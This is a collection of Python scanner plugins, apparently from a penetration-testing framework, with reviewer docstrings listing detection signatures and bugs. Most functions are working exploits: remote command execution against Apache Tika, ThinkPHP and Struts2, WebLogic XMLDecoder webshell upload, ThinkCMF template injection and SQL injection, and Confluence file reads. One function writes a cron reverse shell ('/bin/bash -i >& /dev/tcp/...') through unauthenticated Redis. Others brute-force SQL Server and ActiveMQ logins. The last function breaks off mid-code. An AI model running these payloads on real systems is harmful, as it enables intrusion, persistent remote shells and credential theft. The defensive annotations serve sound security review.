예제 #1
def exec(data):
    """Send a command-carrying PUT to an Apache Tika server's ``meta`` endpoint.

    ``data['cmd']`` is formatted into a JScript body and sent together with
    ``X-Tika-OCR*`` headers. A hit is recorded when the response text
    contains both "X-Parsed-By" and "tika.parse".

    Reviewer notes:
    - The success test only shows that the server parsed the request; it does
      not confirm that anything ran, so a hit needs manual confirmation.
    - Requests to ``meta`` that carry ``X-Tika-OCRTesseractPath`` or
      ``X-Tika-OCRLanguage`` headers are the signal to look for in proxy or
      server logs; a tika-server should not be reachable from untrusted
      networks.
    - The function name shadows the builtin ``exec``.
    """
    init(data, 'apache')
    if data['base_url']:
        # Header names and values exactly as the check sends them.
        headers = {
            "X-Tika-OCRTesseractPath": "\"cscript\"",
            "X-Tika-OCRLanguage": "//E:Jscript",
            "Expect": "100-continue",
            "Content-type": "image/jp2",
            "Connection": "close"
        }

        url = data['base_url'] + "meta"
        jscript = '''var oShell = WScript.CreateObject("WScript.Shell");
         var oExec = oShell.Exec('cmd /c {}');
         '''.format(data['cmd'])
        try:
            res = curl('put', url, headers=headers, data=jscript)
            if res != None and "X-Parsed-By" in res.text and "tika.parse" in res.text:
                data['flag'] = 1
                data['data'].append({"flag": url})
                data['res'].append({
                    "info": res.text,
                    "key": "Apache Tika-server RCE"
                })
        except:
            # NOTE(review): every error is swallowed, so a failed request is
            # indistinguishable from a target that is not affected.
            pass
    return data
예제 #2
def prove(data):
    """Check a ThinkCMF ``edit_post`` endpoint for an error-based SQL injection.

    Posts a fixed form body to ``index.php?g=Portal&m=Article&a=edit_post`` and
    records a hit when the response text contains ':XPATH', i.e. when the
    database error message is echoed back to the client.

    Reviewer notes:
    - The body contains ``updatexml(`` inside a ``post[id][...]`` field, which
      is a usable signature for request logs or a WAF rule.
    - Echoed database errors are what make this check work; suppressing error
      output hides the symptom but does not fix the injection itself.
    - ``curl`` is called outside any ``try``; whether it can raise is not
      visible here.
    """
    init(data,'thinkcmf')
    if data['base_url']:
        url = data[
                  'base_url'] + "index.php?g=Portal&m=Article&a=edit_post"
        # Fixed probe body; nothing from ``data`` is interpolated into it.
        _data = 'term=123&post[post_title]=123&post[post_title]=aaa&post_title=123&post[id][0]=bind&post[id][1]=0 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))'
        res = curl('post', url,data = _data)
        if res != None and ':XPATH' in res.text:
            data['flag'] = 1
            data['data'].append({"flag": url})
            data['res'].append({"info": url, "key": "thinkcmf 2.2.3 sql"})
    return data
예제 #3
def prove(data):
    """Check whether the target answers ``<base_url>/baidu.com`` with an open redirect.

    A hit is recorded when the response carries a ``Location`` header whose
    value starts with ``//baidu.com`` (a scheme-relative redirect to another
    host). Any error while requesting or reading the response is swallowed
    and the target is left unflagged.
    """
    init(data, 'django')
    if not data['base_url']:
        return data

    try:
        url = data['base_url'] + "/baidu.com"
        res = curl('get', url)
        has_location = 'Location' in res.headers.keys()
        redirects_offsite = has_location and res.headers['Location'].startswith('//baidu.com')
        if redirects_offsite:
            data['flag'] = 1
            data['data'].append({"url": url})
            data['res'].append({"info": url, "key": url})
    except:
        pass
    return data
예제 #4
def prove(data):
    """Check a ThinkCMF ``Comment/Widget/fetch`` endpoint for template injection.

    Posts a template body that writes ``bytestforme1.php`` on the server, then
    requests that file and records a hit when it returns 200 and its text
    contains 'php.ini'.

    Reviewer notes:
    - This check is not read-only: on an affected host it leaves
      ``bytestforme1.php`` behind and never removes it. The file name is a
      direct indicator to search for on disk and in access logs.
    - POSTs to ``a=fetch`` whose body contains ``<php>`` and
      ``file_put_contents`` are the request-side signature.
    """
    init(data,'thinkcmf')
    if data['base_url']:
        url = data[
                  'base_url'] + "index.php?g=Comment&m=Widget&a=fetch"
        _data = "templateFile=/../public/index&prefix=''&content=<php>file_put_contents('bytestforme1.php','<?php phpinfo();')</php>"
        res = curl('post', url,data = _data)
        if res != None and res.status_code == 200:
            # Second request verifies that the file written by the first exists.
            res = curl('get', data['base_url'] + "/bytestforme1.php")
            if res != None and res.status_code == 200 and 'php.ini' in res.text:
                data['flag'] = 1
                data['data'].append({"flag": url})
                data['res'].append({"info": url, "key": "thinkcmf 2.2.3 template inject"})
    return data
def exec(data):
    """Post a ``_method=filter`` form carrying ``data['cmd']`` to ThinkPHP entry points.

    The body ``c=system&f=<cmd>&_method=filter`` is sent to ``index.php`` under
    both ``public/`` and the site root; every response with status 500 is
    recorded as a hit together with its text.

    Reviewer notes:
    - A 500 status is the only success criterion, so any unrelated server
      error is reported as a hit; treat results as unconfirmed.
    - Form bodies combining ``_method=filter`` with a ``c=`` function name are
      the signature to alert on.
    - The function name shadows the builtin ``exec``.
    """
    init(data,'web')
    if data['base_url']:
        headers ={ }
        headers['Content-Type'] = 'application/x-www-form-urlencoded'
        # The command is URL-encoded before it is placed in the form body.
        poc = 'c=system&f=%s&_method=filter' %parse.quote_plus(data['cmd'])
        for path in ['public/','']:
            for pocpath in ['index.php']:
                url = data['base_url'] + path + pocpath
                res = curl('post', url, data = poc,headers=headers)
                if res != None and res.status_code == 500:
                    data['flag'] = 1
                    data['data'].append({"flag": url})
                    data['res'].append({"info": res.text, "key": "thinkphp 51~52_getshell"})
    return data
예제 #6
def rebound(data):
    """Write a cron entry through an unauthenticated Redis instance.

    Stores a crontab line under a random key, points Redis' ``dir`` and
    ``dbfilename`` at ``/var/spool/cron/root``, calls ``SAVE``, deletes the
    key and sets ``dir`` to ``/tmp``.

    Raises:
        Exception: if ``local_host`` or ``local_port`` is missing from ``data``.

    Reviewer notes:
    - ``data['flag']`` is set once the Redis calls return without raising;
      nothing verifies that the file was written or that cron picked it up.
    - ``dbfilename`` is never restored, so later saves on the instance go to
      ``/tmp/root``; together with the cron file this is a persistent artifact.
    - Detection: a remote client issuing ``CONFIG SET dir`` and
      ``CONFIG SET dbfilename`` followed by ``SAVE``, or an unexpected binary
      file under ``/var/spool/cron``.
    - Mitigation: require authentication, bind Redis to trusted interfaces
      only, restrict or rename ``CONFIG``, and do not run Redis as root.
    """
    data = init(data, 'redis')

    if 'local_host' not in data.keys() or 'local_port' not in data.keys():
        raise Exception("None local_host or local_port")
    try:
        # Timeouts are commented out, so the connection uses the client defaults:
        # ,socket_connect_timeout=data['timeout'],socket_timeout=data['timeout']
        r = redis.Redis(data['target_host'], data['target_port'])
        payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(
            ip=data["local_host"], port=str(data["local_port"], ))
        path = '/var/spool/cron'
        name = 'root'
        key = _random_string(10)
        r.set(key, payload)
        r.config_set('dir', path)
        r.config_set('dbfilename', name)
        r.save()
        r.delete(key)  # remove the temporary key (clear traces)
        r.config_set('dir', '/tmp')
        data['flag'] = 1
        data['data'].append({
            "key": key,
            "payload": payload,
            "path": path,
            "name": name
        })
        data['res'].append({
            "info": "Success",
            "local_host": data["local_host"],
            "local_port": str(data["local_port"])
        })
    except:
        # NOTE(review): all errors are swallowed, including a failure halfway
        # through, which can leave ``dir``/``dbfilename`` changed on the server.
        pass
    return data
예제 #7
def exec(data):
    """Enumerate IIS 8.3 short names under ``base_url`` with wildcard requests.

    Works through a queue of ``(prefix, extension pattern)`` candidates. Each
    candidate is requested as ``<prefix>*~1<ext>/1.aspx``; a 404 from
    ``_get_status`` is treated as "a name matching this pattern exists" and
    the candidate is extended by one character. Completed names are appended
    to ``data['res']`` as directories or files.

    Reviewer notes:
    - Each level fans out over the whole alphabet, so the check produces a
      large burst of requests containing ``*~1`` and ending in ``/1.aspx``;
      that pattern is easy to alert on.
    - Disabling 8.3 short-name generation on the volume removes the signal
      this check depends on.
    - ``_get_status`` runs outside any ``try``; whether it can raise is not
      visible here.
    - The function name shadows the builtin ``exec``.
    """
    data = init(data, 'web')
    if data['base_url']:
        q = queue.Queue()
        alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-'
        # Normalise the base so that it always ends with a slash.
        path = data['base_url'] if data['base_url'][-1] == '/' else  data['base_url'] + '/'
        for c in alphanum:
            q.put( (path + c, '.*') )    # (candidate name prefix, extension pattern)
        while True:
            if q.qsize() <= 0:
                break
            url, ext = q.get(timeout=1.0)
            status = _get_status(url + '*~1' + ext + '/1.aspx')
            if status == 404:
                if len(url) - len(path) < 6:  # only the first 6 characters are enumerated
                    for c in alphanum:
                        q.put((url + c, ext))
                else:
                    if ext == '.*':
                        # Also test the name with no extension at all.
                        q.put((url, ''))

                    if ext == '':
                        data['flag'] = 1
                        data['res'].append({"info": url + '~1', "key": 'iis_short_file for Dir'})

                    elif len(ext) == 5 or (not ext.endswith('*')):  # e.g. '.asp*', or a fully spelled extension
                        data['flag'] = 1
                        data['res'].append({"info":  url + '~1' + ext, "key": 'iis_short_file for File'})

                    else:
                        # Extend the extension pattern by one character.
                        for c in 'abcdefghijklmnopqrstuvwxyz0123456789':
                            q.put((url, ext[:-1] + c + '*'))
                            if len(ext) < 4:  # shorter than len('.as*')
                                q.put((url, ext[:-1] + c))
    return data
예제 #8
def prove(data):
    """Check a Confluence macro-preview endpoint for a template path traversal.

    Posts a widget-macro JSON body whose ``_template`` parameter is
    ``../web.xml`` to ``rest/tinymce/1/macro/preview``. A hit is recorded when
    the response is 200 and contains ``</web-app>``; the first ``limitSize``
    characters of the matched document are kept as evidence.

    Reviewer notes:
    - Request bodies for this endpoint whose ``_template`` value contains
      ``../`` or points at a file path are the signature to alert on.
    - Only a short excerpt is stored, which limits how much server
      configuration ends up in scan results.
    """
    data = init(data, 'confluence')
    if data['base_url']:
        filename = "../web.xml"
        limitSize = 100

        payload = data['base_url'] + "rest/tinymce/1/macro/preview"
        headers = {
            "User-Agent":
            "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
            "Referer": data['base_url'] +
            "pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
            "Content-Type": "application/json; charset=utf-8"
        }
        _data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
        try:
            r = curl('post', payload, data=_data, headers=headers)
            if r.status_code == 200 and "</web-app>" in r.text:
                # NOTE(review): the pattern is not a raw string; newer Python
                # versions warn about the escape sequences in it.
                m = re.search('<web-app[\s\S]+<\/web-app>', r.text)
                if m:
                    content = m.group()[:limitSize]
                    data['flag'] = 1
                    data['data'].append({"content": content})
                    data['res'].append({"info": payload, "key": filename})

        except:
            # Errors (including ``r`` being None) are swallowed silently.
            pass

    return data
예제 #9
def prove(data):
    '''
    Guess the name of a DedeCMS admin directory through ``tags.php``.

    Fairly time-consuming; running this script on its own is recommended.

    The check posts ``_FILES[...]`` form fields whose ``tmp_name`` is
    ``./<guess><</images/adminico.gif``. A 200 response that does not contain
    "Upload filetype not allow !" is treated as "a directory starting with
    <guess> exists". A first pass looks for a starting prefix, a second pass
    extends it one character at a time.

    Reviewer notes:
    - The check generates a very large number of POSTs to ``tags.php`` with
      ``_FILES[...][tmp_name]`` fields containing ``<<``; both the volume and
      the field names are straightforward to alert on.
    - ``curl`` is called outside any ``try``; whether it can raise is not
      visible here.
    '''
    data = init(data, 'dedecms')
    if data['base_url']:
        characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
        # ``{p}`` is the placeholder that each guess is formatted into.
        _data = {
            "_FILES[mochazz][tmp_name]": "./{p}<</images/adminico.gif",
            "_FILES[mochazz][name]": 0,
            "_FILES[mochazz][size]": 0,
            "_FILES[mochazz][type]": "image/gif"
        }
        for a in ['', 'dedecms/']:
            url = data['base_url'] + a + 'tags.php'
            back_dir = ""
            flag = 0
            res = curl('get', url)
            if res!=None and res.status_code ==200:
                # Pass 1: find a starting prefix of 1 to 6 characters.
                for num in range(1, 7):
                    if flag ==1 :
                        break
                    for pre in itertools.permutations(characters, num):
                        pre = ''.join(list(pre))
                        _data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=pre)
                        r = curl('post', url, data=_data)
                        if r!=None:
                            if "Upload filetype not allow !" not in r.text and r.status_code == 200:
                                flag = 1
                                back_dir = pre
                                # Restore the template for the next request.
                                _data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
                                break
                            else:
                                _data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
                # Pass 2: extend the prefix one character per round, up to 30 rounds.
                flag = 0
                x = 0
                for i in range(30):
                    if flag == 1:
                        x = i
                        break
                    for ch in characters:
                        # Reaching the last character without a match ends the search.
                        if ch == characters[-1]:
                            flag = 1
                            x = i
                            break
                        _data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=back_dir + ch)
                        r = curl('post', url, data=_data)
                        if r != None:
                            if "Upload filetype not allow !" not in r.text and r.status_code == 200:
                                back_dir += ch
                                _data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
                                break
                            else:
                                _data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"

                # NOTE(review): if ``r`` is None the template is not restored, so
                # the following ``format`` call is a no-op and the same guess is
                # re-sent; confirm this is acceptable.
                if x < 29 and flag ==1:
                    data['flag'] = 1
                    data['data'].append({"url": data['base_url'] + a + back_dir})
                    data['res'].append({"info":  data['base_url'] + a + back_dir, "key": 'dede_manage'})
    return data
예제 #10
def exec(data=None):
    """Send a multipart upload whose part carries an OGNL expression to a Struts URL.

    ``data['cmd']`` replaces the ``%COMMAND%`` marker in the expression, and
    the result is passed as the first element of the ``files`` tuple
    (presumably the file name, if ``curl`` follows the requests convention;
    confirm against ``curl``).

    Reviewer notes:
    - ``data['flag']`` is set as soon as the request returns without raising;
      the response is not checked, so a hit from this function is not
      evidence that the target is affected.
    - Multipart requests whose part headers contain ``%{``,
      ``#_memberAccess`` or ``java.lang.ProcessBuilder`` are the signature to
      alert on.
    - The function name shadows the builtin ``exec``.
    """
    data = init(data, 'struts')
    if data['url'] != None:

        cmd = data['cmd']
        exec_poc = '''%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='%COMMAND%').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00b'''
        headers = {}
        try:
            files = {
                "test": (exec_poc.replace("%COMMAND%", cmd), "text/plain")
            }
            r = curl('post',
                     data['url'],
                     headers=headers,
                     files=files,
                     stream=True).text
            res = ""
            try:
                for line in r.iter_lines():
                    res += str(line) + '\r\n'
            except:
                res = str(res)
            # Recorded unconditionally; see the reviewer notes in the docstring.
            data['flag'] = 1
            data['data'].append({"poc": exec_poc})
            data['res'].append({"info": res, "key": cmd})
        except:
            pass
    return data
예제 #11
def upload(data=None):
    """Post XML bodies to WebLogic's ``wls-wsat`` endpoint and look for ``ahtest.jsp``.

    ``shellpoc1`` and ``shellpoc2`` are defined elsewhere in the file. After
    each POST to ``wls-wsat/CoordinatorPortType`` the function requests
    ``ahtest.jsp`` (first under ``bea_wls_internal``, then under ``wls-wsat``)
    and records a hit when the page returns 200 and contains 'ahtest'.

    Reviewer notes:
    - This function is not read-only: on an affected host it leaves
      ``ahtest.jsp`` on the server. The file name and the ``pwd=ahtest``
      query string recorded in the results are indicators to search for in
      the deployment directories and in access logs.
    - ``text/xml`` POSTs to ``/wls-wsat/CoordinatorPortType`` from outside the
      application's own peers are the request-side signal; if the component
      is unused, blocking or removing it closes this path.
    - ``result`` is dereferenced without a None check and outside any ``try``,
      so a failed request raises here instead of returning ``data``.
    """
    data = init(data, 'weblogic')
    if data['base_url']:
        headers = {"Content-Type": "text/xml"}
        url = data['base_url'] + 'wls-wsat/CoordinatorPortType'
        # The POST response is discarded; only the follow-up GET is inspected.
        result = curl('post', url, data=shellpoc1, headers=headers)
        targeturl = data['base_url'] + "/bea_wls_internal/ahtest.jsp"
        result = curl('get', targeturl)
        if str(result.status_code) == '200' and 'ahtest' in result.text:
            data['flag'] = 1
            data['data'].append({"page": '/wls-wsat/CoordinatorPortType'})
            data['res'].append({
                "info": url,
                "key": targeturl + "?pwd=ahtest&cmd=whoami"
            })
        else:
            # Second attempt with the alternative body and location.
            result = curl('post', url, data=shellpoc2, headers=headers)
            targeturl = data['base_url'] + "/wls-wsat/ahtest.jsp"
            result = curl('get', targeturl)
            if str(result.status_code) == '200' and 'ahtest' in result.text:
                data['flag'] = 1
                data['data'].append({"page": '/wls-wsat/CoordinatorPortType'})
                # NOTE(review): "info" and "key" are swapped relative to the
                # first branch; consumers of ``data['res']`` should not rely on
                # their order.
                data['res'].append({
                    "info": targeturl + "?pwd=ahtest&cmd=whoami",
                    "key": "/wls-wsat/CoordinatorPortType"
                })
    return data
예제 #12
def prove(data):
    """Check WebLogic's ``wls-wsat`` endpoint by writing and fetching a marker file.

    Posts a SOAP body that asks the server to write a ``<random>.txt`` file
    containing ``xmldecoder_vul_test``, then requests that file. A hit is
    recorded when the file returns 200 and contains the marker. A second
    location is tried when the first one fails.

    Reviewer notes:
    - The check is not read-only: each successful attempt leaves a
      six-digit-named ``.txt`` file containing ``xmldecoder_vul_test`` on the
      server, and nothing removes it. Marker and naming pattern are
      indicators to search for.
    - SOAP bodies containing ``java.beans.XMLDecoder`` inside a
      ``work:WorkContext`` header are the request-side signature.
    - ``random.randint`` is only used for a file name here, not for anything
      security-sensitive.
    """
    data = init(data, 'weblogic')
    if data['base_url']:
        headers = {"Content-Type": "text/xml"}
        url = data['base_url'] + 'wls-wsat/CoordinatorPortType'
        ran = str(random.randint(100000, 999999))
        poc = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/' + ran + '.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
        try:
            result = curl('post', url, data=poc, headers=headers)
            targeturl = data['base_url'] + "/bea_wls_internal/" + ran + ".txt"
            result = curl('get', targeturl)
            if result and str(
                    result.status_code
            ) == '200' and 'xmldecoder_vul_test' in result.text:
                data['flag'] = 1
                data['data'].append({"page": '/wls-wsat/CoordinatorPortType'})
                data['res'].append({"info": url, "key": targeturl})
            else:
                ran = str(random.randint(100000, 999999))
                poc = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/' + ran + '.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
                result = curl('post', url, data=poc, headers=headers)
                targeturl = data['base_url'] + "/wls-wsat/" + ran + ".txt"
                # NOTE(review): this fetches ``url`` although ``targeturl`` was
                # built on the previous line, so the result of this branch may
                # not reflect the marker file; confirm intent.
                result = curl('get', url)
                if result and str(
                        result.status_code
                ) == '200' and 'xmldecoder_vul_test' in result.text:
                    data['flag'] = 1
                    data['data'].append(
                        {"page": '/wls-wsat/CoordinatorPortType'})
                    data['res'].append({"info": targeturl, "key": url})
        except Exception as e:
            # The exception is bound but never logged.
            pass
    return data
예제 #13
def prove(data):
    """Test a SQL Server instance against username and password dictionaries.

    Dictionaries come from ``data['d1']`` / ``data['d2']`` when present,
    otherwise from the bundled ``dict/sqlserver_*.txt`` files. A ``%user%``
    placeholder in a password entry is replaced by the current username. The
    function returns on the first pair for which ``pymssql.connect`` succeeds.

    Reviewer notes:
    - The working credentials are stored in clear text in ``data['data']`` and
      ``data['res']``; handle scan output as sensitive.
    - The successful connection ``db`` is never closed.
    - Every failure is swallowed, so network errors and rejected logins look
      the same to the caller.
    - On the server side this appears as a burst of failed logins from one
      source; login auditing, lockout or rate limiting, and restricting
      network access to the listener are the relevant controls.
    """
    data = init(data, 'sqlserver')
    # Dictionaries are only read once the port is known to be reachable.
    if _socket_connect(data['target_host'], data['target_port']):
        usernamedic = _read_dic(data['d1']) if 'd1' in data.keys(
        ) else _read_dic('dict/sqlserver_usernames.txt')
        passworddic = _read_dic(data['d2']) if 'd2' in data.keys(
        ) else _read_dic('dict/sqlserver_passwords.txt')
        for linef1 in usernamedic:
            username = linef1.strip('\r').strip('\n')
            for linef2 in passworddic:
                password = (
                    linef2 if '%user%' not in linef2 else str(linef2).replace(
                        "%user%", str(username))).strip('\r').strip('\n')
                try:
                    db = pymssql.connect(server=data['target_host'],
                                         port=data['target_port'],
                                         user=username,
                                         password=password,
                                         charset="UTF-8")
                    data['flag'] = 1
                    data['data'].append({
                        "username": username,
                        "password": password
                    })
                    data['res'].append({
                        "info": username + "/" + password,
                        "key": 'sqlserver'
                    })
                    return data
                except:
                    pass
    return data
예제 #14
def prove(data):
    """Fingerprint a WAF in front of ``data['url']`` from one GET response.

    ``_dna`` (defined elsewhere) is read as one ``name|location|key|value``
    record per line. Records with location "headers" are matched against the
    response headers, records with location "index" against the body; the
    first match names the WAF.

    Reviewer notes:
    - ``re.search(reg, header, re.I)`` receives the headers object itself. If
      that is a mapping rather than a string (presumably, for a requests-style
      response; confirm against ``curl``), the call raises TypeError, the bare
      ``except`` swallows it, and the function returns without a result as
      soon as the first "headers" record is reached.
    - The page title is printed to stdout, which looks like leftover
      debugging output.
    """
    data = init(data, 'web')
    if data['url']:
        try:
            waf = None
            res = curl('get', data['url'])
            header = res.headers
            html = res.text
            mark_list = []
            marks = _dna.strip().splitlines()
            for mark in marks:
                # maxsplit=3 keeps any '|' inside the regex part intact.
                name, location, key, value = mark.strip().split("|", 3)
                mark_list.append([name, location, key, value])

            for mark_info in mark_list:
                name, location, key, reg = mark_info
                if location == "headers":
                    if re.search(reg, header, re.I) and key in header:
                        waf = name
                        break
                if location == "index":
                    if re.search(reg, html, re.I):
                        waf = name
                        break
            # NOTE(review): not a raw string; newer Python versions warn about
            # the escape sequence in this pattern.
            m = re.search('<title>(.*)?<\/title>', html)
            if m:
                print(m.group(1), 'title')
            if waf != None:
                data['flag'] = 1
                data['res'].append({"info": waf, "key": "waf"})
        except:
            pass
    return data
예제 #15
def prove(data):
    """Test an ActiveMQ ``admin/`` console against credential dictionaries.

    Each username/password pair is sent as an HTTP Basic ``Authorization``
    header (placed in ``data['headers']``) on a GET to ``admin/``; the target
    is flagged when the response text contains 'Console'.

    Reviewer notes:
    - The two ``append`` calls sit outside the ``if 'Console'`` test, so every
      attempted pair is recorded in ``data['data']`` and ``data['res']``
      whether it worked or not. Only ``data['flag']`` reflects success, and it
      does not say which pair succeeded.
    - ``b64encode`` is given a ``str``. If this is the standard-library
      ``base64.b64encode`` on Python 3 (presumably; confirm the import), it
      raises TypeError, which the ``except`` swallows, so no request is sent.
    - The last ``Authorization`` header stays in ``data['headers']`` after the
      function returns.
    - Recorded credentials are clear text; handle scan output as sensitive.
    - On the server side this is a burst of 401 responses for ``/admin/`` from
      one source.
    """
    data = init(data, 'activemq')
    if data['base_url']:
        usernamedic = _read_dic(data['d1']) if 'd1' in data.keys(
        ) else _read_dic('dict/activemq_usernames.txt')
        passworddic = _read_dic(data['d2']) if 'd2' in data.keys(
        ) else _read_dic('dict/activemq_passwords.txt')
        url = data['base_url'] + "admin/"
        for linef1 in usernamedic:
            username = linef1.strip('\r').strip('\n')
            for linef2 in passworddic:
                try:
                    # '%user%' in a password entry stands for the current username.
                    password = (linef2 if '%user%' not in linef2
                                else str(linef2).replace(
                                    "%user%",
                                    str(username))).strip('\r').strip('\n')
                    key = b64encode(":".join([username, password]))
                    data['headers']["Authorization"] = 'Basic %s' % key
                    # ``curl`` is not passed the headers explicitly; presumably
                    # it reads them from shared state (confirm).
                    res = curl('get', url)
                    if 'Console' in res.text:
                        data['flag'] = 1
                    data['data'].append({
                        "username": username,
                        "password": password
                    })
                    data['res'].append({
                        "info": username + "/" + password,
                        "key": "Authorization: " + key
                    })
                except Exception:
                    pass
    return data
예제 #16
def prove(data):
    """List the target's TLS ciphers and replay one fixed request over each of them.

    Runs ``pysslscan`` against ``data['target_host']``, extracts the cipher
    name from every "Accepted"/"Preferred" output line, maps it to a curl
    cipher name through ``_openssl_ssls`` / ``_curl_ssls`` (falling back to a
    name derived from the suite name), and calls ``_curl`` with a fixed query
    string. Ciphers for which ``_curl`` returns 200 are recorded.

    Reviewer notes:
    - The fixed query string resembles an SQL-injection test value, so the
      check appears to look for a filtering device that handles the request
      differently depending on the negotiated cipher (inferred; confirm).
      For defenders, a finding means inspection coverage should be verified
      for every cipher suite the front end accepts.
    - ``target_host`` is concatenated into a command string that is then split
      on whitespace. A host value containing spaces, or starting with ``-``,
      would be passed to ``pysslscan`` as additional arguments; validate the
      host before it reaches this function.
    """
    # from sslscan import ui
    # ui.load_modules()
    # scanner = ui.Scanner()
    # for pro in ["ssl2","ssl3","tls10","tls11","tls12"]:
    #     scanner.config.set_value(pro, True)
    # name, sep, options = 'server.ciphers'.partition(":")
    # scanner.append_load(name, options, base_class=ui.BaseScan)
    # name, sep, options = "term:rating=builtin.0_5".partition(":")
    # scanner.append_load(name, options, base_class=ui.BaseReport)
    # module = scanner.load_handler_from_uri("www.baidu.com")
    # scanner.set_handler(module)
    # scanner.reset_knowledge_base()
    # scanner.run_scans()
    # scanner.run_reports()

    data = init(data, 'web')
    if data['base_url']:
        cmd = 'pysslscan scan --scan server.ciphers  --scan=server.preferred_ciphers --ssl2 --ssl3 --tls10 --tls11 --tls12 ' + data[
            'target_host']
        # cmd = 'sslscan --no-colour --no-heartbleed --show-ciphers --sleep 500 --timeout=45 '+ data['target_host']
        # The command is handed over as an argument list, not a shell string.
        lines = _subprocess(cmd.split())
        lines = lines.strip().split('\n')
        poc = "?&mtestid=1%27%20and%20%271%27$%271"
        # Cipher names already tried, so each one is requested only once.
        ssllist = []
        for line in lines:
            # line = str(line, 'utf-8')
            if "Accepted" in line or "Preferred" in line:
                # NOTE(review): compiled on every iteration and not a raw
                # string; could be hoisted out of the loop.
                pattern = re.compile('[A-Z\d\_]{5,}')
                match = pattern.search(line)
                if match:
                    # TLS_RSA_WITH_AES_128_CBC_SHA
                    # curl --ciphers ecdhe_rsa_aes_256_sha    https://www.baidu.com'
                    ciphers = match.group()
                    if ciphers in _openssl_ssls.keys():
                        ciphers_ciphers = _openssl_ssls[ciphers]
                    elif ciphers in _curl_ssls.keys():
                        ciphers_ciphers = _curl_ssls[ciphers]
                    else:
                        # Fallback: drop the first '_' component and join the rest with '-'.
                        ciphers_ciphers = "-".join(ciphers.split("_")[1:])
                    if ciphers_ciphers not in ssllist:
                        res_status = _curl(data['base_url'], ciphers_ciphers,
                                           poc)
                        # print("curl --ciphers " + ciphers_ciphers + "  " + base_url + poc, str(res_status))
                        if res_status == 200:
                            data['flag'] = 1
                            data['data'].append({"ssl": ciphers})
                            data['res'].append({
                                "key":
                                ciphers + " " + str(res_status),
                                "info":
                                "curl --ciphers " + ciphers_ciphers + "  " +
                                data['base_url'] + poc
                            })
                        ssllist.append(ciphers_ciphers)

    # code = chardet.detect(waf_ssl)['encoding'] if chardet.detect(waf_ssl)['encoding'] not in ['ISO-8859-5','KOI8-R'] else 'gbk'
    # print(waf_ssl.decode(code)+":"+code)

    return data
예제 #17
def prove(data):
    """Check a PHPCMS site for an arbitrary file download through ``content/down``.

    Chains four requests: read the ``_siteid`` cookie from the wap index, post
    it as ``userid_flash`` to ``swfupload_json`` to obtain an ``_att_json``
    cookie, pass that cookie value as ``a_k`` to ``content/down``, then follow
    the first link in the resulting page. A hit is recorded when the final
    response contains ``<?php``.

    Reviewer notes:
    - The downloaded content is stored in ``data['res']`` under 'connect'.
      On an affected host that is server-side source code, which may contain
      secrets; handle scan output as sensitive.
    - ``re.findall(...)[0]`` raises IndexError when the page has no link, and
      nothing here catches it.
    - Requests to ``a=swfupload_json`` whose ``src`` parameter contains
      multiply-encoded characters (``%25253c`` here) are the signature to
      alert on.
    """
    data = init(data, 'phpcms')
    if data['base_url']:
        headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.4 (KHTML, like Gecko) Chrome/6.0.481.0 Safari/534.4"}
        for path in ["", "phpcms/"]:
            # Step 1: obtain the site cookie.
            url1 = data['base_url'] + path +"index.php?m=wap&c=index&a=init&siteid=1"
            res1 = curl('get',url1,headers = headers)
            if res1 !=None:
                for cookie in res1.cookies:
                    if '_siteid' in cookie.name:
                        userid = cookie.value

                        # Step 2: exchange it for the attachment cookie.
                        url2 = data['base_url'] + path +"index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=pad%3Dx%26i%3D1%26modelid%3D1%26catid%3D1%26d%3D1%26m%3D1%26s%3Dindex%26f%3D.p%25253chp"
                        _data1 = {'userid_flash': userid}
